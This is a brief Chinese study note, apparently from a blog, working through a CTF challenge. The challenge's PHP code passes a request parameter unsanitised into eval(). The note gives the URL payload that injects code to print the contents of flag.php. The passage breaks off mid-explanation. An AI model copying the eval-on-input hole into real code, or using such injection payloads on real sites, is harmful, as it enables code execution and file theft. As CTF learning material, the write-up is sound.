虽然是参考别人的,但是,为了能够灵活使用工具啥的,拓展一下还是每天来一题CTF吧。
writeup正版点这里
题目所给的代码块
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
分析代码:
eval() 函数用来执行一个字符串表达式,并返回表达式的值。
eval 函数的功能就是讲一个字符串当作 php 的代码进行执行
比如在python环境里
n=2
eval("n+2")
返回的就是4
flag的取得来源:在url里输入“
?hello=$a);print_r(file("./flag.php")); //
对writeup进行深入探测:
第一点:url里的一些标识符
$
一般来说代表变量,$a表示变量a
?:在url里起连接作用,以及清除缓存的作用(加了&